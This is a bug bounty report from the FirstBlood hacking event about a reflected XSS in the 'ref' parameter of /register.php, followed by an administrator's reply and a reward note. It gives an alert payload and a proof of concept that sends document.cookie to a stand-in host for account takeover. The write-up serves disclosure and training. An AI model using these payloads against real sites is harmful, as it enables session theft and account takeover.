FirstBlood-#153Reflected XSS on register.php



On 2021-05-10, 0xblackbird reported:

Hello! I found a reflected xss on /register.php. It allowed me to execute javascript on the victims behalf whenever he/she clicks on Return to previous page. I was able to escalate this to account takeover and by stealing the cookies.

Steps to reproduce

  • Visit /register.php?ref=javascript:alert(document.domain) and click on Return to previous page.
  • The xss will fire and you'll see an alert box with the document domain.
  • Now to prove the account takeover, I made a little proof of concept: /register.php?ref=javascript:window.location.href=%60http://localhost/${document.cookie}%60. This little javascript PoC will redirect us to http://localhost/{cookies}. From there, the attacker can read the cookie in the server logs and takeover the victim's account with 1 click.

Impact

I was able to execute javascript on victims behalf and by that takeover his or her account completely.

Background

Thanks for your methodology, I got the idea from there that parameters get re-used. I came accross that parameter on /drpanel/logout.php and re-used it here. And to my surprise, I found out that the value reflects back in the href html tag.

Thanks! Have a nice day!

Kind regards, 0xblackbird

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: javascript:alert(document.domain)


FirstBlood ID: 16
Vulnerability Type: Reflective XSS

The parameter "ref" is vulnerable to XSS on register.php. The developers failed to filter javascript: when used on "return to previous page"

Report Feedback

@zseano

Creator & Administrator


Nice find!


Respect Earnt: 2500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.